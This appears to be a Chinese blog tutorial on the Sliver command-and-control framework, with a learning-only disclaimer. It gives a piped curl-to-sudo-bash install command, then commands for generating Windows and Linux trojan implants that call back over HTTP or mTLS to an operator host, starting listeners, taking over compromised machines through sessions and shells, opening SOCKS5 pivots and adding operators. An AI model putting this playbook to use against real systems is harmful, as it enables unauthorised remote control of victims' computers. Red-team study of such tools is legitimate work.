sliver
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
项目地址
使用文档
相关文章
安装
官方一条命令版
# 安装
curl https://sliver.sh/install|sudo bash
# 连接(默认连接本地服务器)
sliver
# 如果默认连接本地失败,可能是服务没有开启,手动开启再连接即可
systemctl start sliver
sliver
使用
连接服务器后会进去到类似 pupy 的命令行交互界面,使用方法其实差不多
sliver 自 1.5 版本开始,支持2种操作模式 Session Mode/Beacon Mode
Beacon Mode 实现了一种异步通信方式,在这种方式中,木马程序定期检查服务器检索任务、执行它们并返回结果。
Session Mode 木马程序将根据底层 C2 协议使用持久连接或使用长轮询创建交互式实时会话。
生成 shell (http)
Session Mode
generate -h
generate --http example.com --save /tmp
# 指定平台
generate --http example.com --save /tmp --os win
generate --http example.com --save /tmp --os linux
Beacon Mode
generate beacon --http example.com --save /tmp
启动监听器
http -h
http --domain example.com
# 查看当前的监听器
jobs
# 关闭监听器
jobs -k [int]
示例
比如我服务器的外网 ip 为 1.14.5.14 ,监听器在 1919 端口,生成一个 windows 的木马
generate --http http://1.14.5.14:1919 --save /tmp --os win
# 开启一个基于 http 1919 端口的C2
http -l 1919
生成 shell (mtls)
generate --mtls example.com --save /tmp --os win
启动监听器
mtls
jobs
进入 shell
当有主机上线后,控制台会有log提示,我们可以运行 sessions 查看可控制的机器列表
sessions
使用 use 后面跟 session id 指定要控制的目标主机
use [session id]
选中 sessions 后,我们可用2种控制模式
interactive
交互式会话,在 sliver 中某些命令,例如 shell portfwd 仅适用于交互式会话
# 在选中 sessions 后 (仅beacon模式可用)
interactive
close
shell
# 在选中 sessions 后
shell
socks5
- https://github.com/BishopFox/sliver/wiki/Reverse-SOCKS
- https://github.com/BishopFox/sliver/tree/master/client/command/socks
开启 socks5 代理
# 在进入 sessions 后 (仅 session 模式可用)
socks5 start
# 默认监听在 127.0.0.1 可自行指定监听的ip、端口、配置socks5认证
socks5 start --help
关闭 socks5 代理
socks5 stop -i [ID]
多人运动
服务端
/root/sliver-server operator --name f8x --lhost [服务端ip] --save f8x.cfg
用户端
# 导入服务端生成的配置文件
sliver import ./f8x.cfg
# 再次启动会让你选择使用哪个 server
sliver
GUI
使用和命令行 client 端一样,从服务端下载 cfg 文件导入即可
点击关注,共同学习!
安全狗的自我修养